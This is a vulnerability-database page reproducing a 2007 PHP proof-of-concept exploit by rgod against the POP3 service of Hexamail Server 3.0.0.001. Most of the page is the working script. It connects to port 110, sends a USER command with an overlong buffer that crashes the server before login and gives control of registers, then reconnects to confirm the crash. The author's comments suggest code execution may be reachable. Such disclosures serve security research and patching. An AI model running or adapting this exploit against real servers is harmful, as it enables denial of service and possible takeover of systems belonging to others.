Lucene search

K

hexamail-dos.txt

🗓️ 31 Aug 2007 00:00:00Reported by rgodType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 15 Views

Hexamail Server 3.0.0.001 (pop3) pre-auth remote overflow poc by rgod

Show more
Code
`<?php  
/*  
  
Hexamail Server 3.0.0.001 (pop3) pre-auth remote overflow poc  
  
by rgod  
http://retrogod.altervista.org  
  
tested against the Lite one  
this one crashes the entire server  
you are in control of eax and ecx,  
I think arbitrary code execution is possible  
but a little tricky, see you soon ;)  
  
vendor url: http://www.hexamail.com/hexamailserver/  
  
*/  
  
error_reporting(0);  
if ($argc<2) {die("[!]Syntax: php $argv[0] [ip]\n");}  
echo "[*]Connecting to target host...\n";  
$fp=fsockopen($argv[1],110, $errno, $errstr, 5);  
if (!$fp) {die("[!]unable to connect ...");}  
else {echo "[*]connected...\n";}  
$eax="XXXX";  
$ecx="YYYY";  
$bof="./".str_repeat("A",15).$eax.$ecx.str_repeat("A",1025);  
$bof = "USER ".$bof."\r\n";  
fputs($fp,$bof);  
fgets($fp);  
fclose($fp);  
echo "[*]Sent.\n";  
sleep(2);  
$fp=fsockopen($argv[1],110, $errno, $errstr, 5);  
if (!$fp) {echo "[*]exploit succeeded...\n";}  
else {echo "[!]it seems not working...\n";}  
?>  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo